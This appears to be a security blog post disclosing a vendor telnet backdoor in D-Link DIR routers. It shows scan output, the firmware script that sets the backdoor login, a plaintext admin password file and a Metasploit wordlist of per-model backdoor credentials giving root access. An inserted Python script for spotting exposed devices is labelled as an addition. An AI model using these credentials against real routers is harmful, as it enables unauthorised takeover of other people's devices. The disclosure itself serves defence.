no one is safe ...

Your Telnet Backdoor is waiting for you

It is too bad if your device ships with a backdoor directly from the vendor. In some D-Link devices you will find a telnet server listening on the internal network interface. The following output shows the results of an Nmap scan of three different D-Link DIR devices (DIR-300revA, DIR-300revB, DIR-600revB):

root@bt:~# nmap -sSV -p 23 192.168.178.133,144,222
Starting Nmap 6.01 ( http://nmap.org ) at 2013-04-30 13:42 CEST
Nmap scan report for 192.168.178.133
Host is up (0.0067s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 1C:BD:B9:A7:7F:74 (D-link International PTE Limited)
Service Info: Device: WAP

Nmap scan report for 192.168.178.144
Host is up (0.0068s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 00:26:5A:38:7D:77 (D-Link)
Service Info: Device: WAP

Nmap scan report for 192.168.178.222
Host is up (0.0031s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 34:08:04:DB:6D:FE (D-Link)
Service Info: Device: WAP
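As an added defender-side example (not code from the original post), the following Python script parses Nmap normal output like the scan above and flags every host whose open port 23 carries the D-Link telnetd service fingerprint, so you can inventory affected devices on your own network. The sample scan text is constructed and modelled on the output above.

```python
import re

# Constructed sample modelled on the scan above: one D-Link host, one unrelated host.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.178.133
Host is up (0.0067s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 1C:BD:B9:A7:7F:74 (D-link International PTE Limited)

Nmap scan report for 192.168.178.150
Host is up (0.0050s latency).
PORT   STATE SERVICE VERSION
23/tcp closed telnet
MAC Address: 00:11:22:33:44:55 (Example Vendor)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17}) \((.*)\)$")
# Version string Nmap's probe database assigns to the telnetd in these D-Link firmwares.
BACKDOOR_SIGNATURE = "D-Link 524, DIR-300, or WBR-1310 WAP telnetd"

def parse_nmap(text):
    """Split Nmap normal output into one dict per host: ip, mac, vendor, ports."""
    hosts, cur = [], None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            cur = {"ip": m.group(1), "mac": None, "vendor": None, "ports": []}
            hosts.append(cur)
        elif cur is None:
            continue  # skip the Nmap banner before the first host
        elif m := PORT_RE.match(line):
            cur["ports"].append({"port": int(m.group(1)), "state": m.group(2),
                                 "service": m.group(3), "version": (m.group(4) or "").strip()})
        elif m := MAC_RE.match(line):
            cur["mac"], cur["vendor"] = m.group(1), m.group(2)
    return hosts

def flag_backdoor_hosts(hosts):
    """Return IPs with an open TCP/23 whose version string carries the D-Link telnetd fingerprint."""
    return [h["ip"] for h in hosts
            if any(p["port"] == 23 and p["state"] == "open" and BACKDOOR_SIGNATURE in p["version"]
                   for p in h["ports"])]

if __name__ == "__main__":
    for ip in flag_backdoor_hosts(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print("vendor telnetd exposed on", ip)  # prints 192.168.178.133 for the sample
```

Feed it the saved output of `nmap -sSV -p 23 <your LAN range> -oN scan.txt` to get the list of devices that need the telnet service disabled or a firmware update.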

The credentials are well known and documented in lots of different places around the internet; just search Google for "telnet dlink".
If you are interested in the configuration of this backdoor, take a look at the following start script from a DIR-300 firmware image:

./rootfs/etc/scripts/misc/telnetd.sh
#!/bin/sh
image_sign=`cat /etc/config/image_sign`
TELNETD=`rgdb -g /sys/telnetd`
if [ "$TELNETD" = "true" ]; then
        echo "Start telnetd ..." > /dev/console
        if [ -f "/usr/sbin/login" ]; then
                lf=`rgdb -i -g /runtime/layout/lanif`
                telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
        else
                telnetd &
        fi
fi
root@bt:~/firmware/DIR300-extracted# cat rootfs/etc/config/image_sign
wrgg19_c_dlwbr_dir300

On a DIR-300 rev B you will find this configuration in /etc/init0.d/S80telnetd.sh. With the user Alphanetworks and the value of image_sign as the password you are able to log in via telnet.
After logging in you are directly root on this box.


This is quite amazing, but it would be a lot better if you could also configure the box via the web management interface. There are two ways to get the password of your management interface. First of all, you could just extract it from var/etc/httpasswd. Plaintext passwords are so neat:

# cat var/etc/httpasswd
admin:admin

The next possibility is to use your root access to directly grep the memory for it:


With this you could probably also find such a password on a device where the password is stored encrypted, or where you could not find it on the hard drive at all.

Now you are able to use your secret password to login via web.

To test your D-Link devices for such a backdoor, use for example Nmap to detect the telnet servers and then use the password list included in the Metasploit Framework at data/wordlists/dlink_telnet_backdoor_userpass.txt.

root@bt:~/msf-git/metasploit-framework# cat data/wordlists/dlink_telnet_backdoor_userpass.txt
Alphanetworks wrgg19_c_dlwbr_dir300
Alphanetworks wrgn49_dlob_dir600b
Alphanetworks wrgn23_dlwbr_dir600b
Alphanetworks wrgn22_dlwbr_dir615
Alphanetworks wrgnd08_dlob_dir815
Alphanetworks wrgg15_di524
Alphanetworks wrgn39_dlob.hans_dir645

This password list is a first version and I think you could find some more passwords for this backdoor. If you find some more, it would be quite helpful if you add them to this list.